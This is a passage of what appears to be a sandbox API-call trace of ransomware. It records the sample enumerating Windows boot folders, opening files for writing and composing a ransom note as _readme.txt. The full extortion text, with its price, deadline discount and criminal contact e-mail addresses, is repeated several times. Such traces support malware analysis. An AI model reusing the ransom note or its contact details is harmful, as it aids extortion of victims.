(lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x2c0000) returned 1 [0201.499] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0201.499] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0201.499] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0201.499] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.501] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0201.501] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0201.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.501] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.501] PathFindFileNameW (pszPath="") returned="" [0201.501] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.502] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.502] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.502] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.502] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0201.502] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 0 [0201.502] lstrcpyW (in: lpString1=0x3b68060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.502] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.502] CreateFileW (lpFileName="C:\\Boot\\de-DE\\_readme.txt" (normalized: "c:\\boot\\de-de\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0201.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68060 | out: hHeap=0x2c0000) returned 1 [0201.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.503] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.503] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.503] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0201.503] PathFindExtensionW (pszPath="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned=".mui" [0201.503] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced80 | out: hHeap=0x2c0000) returned 1 [0201.503] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0201.503] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0201.504] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0201.504] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0201.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.507] HeapFree (in: 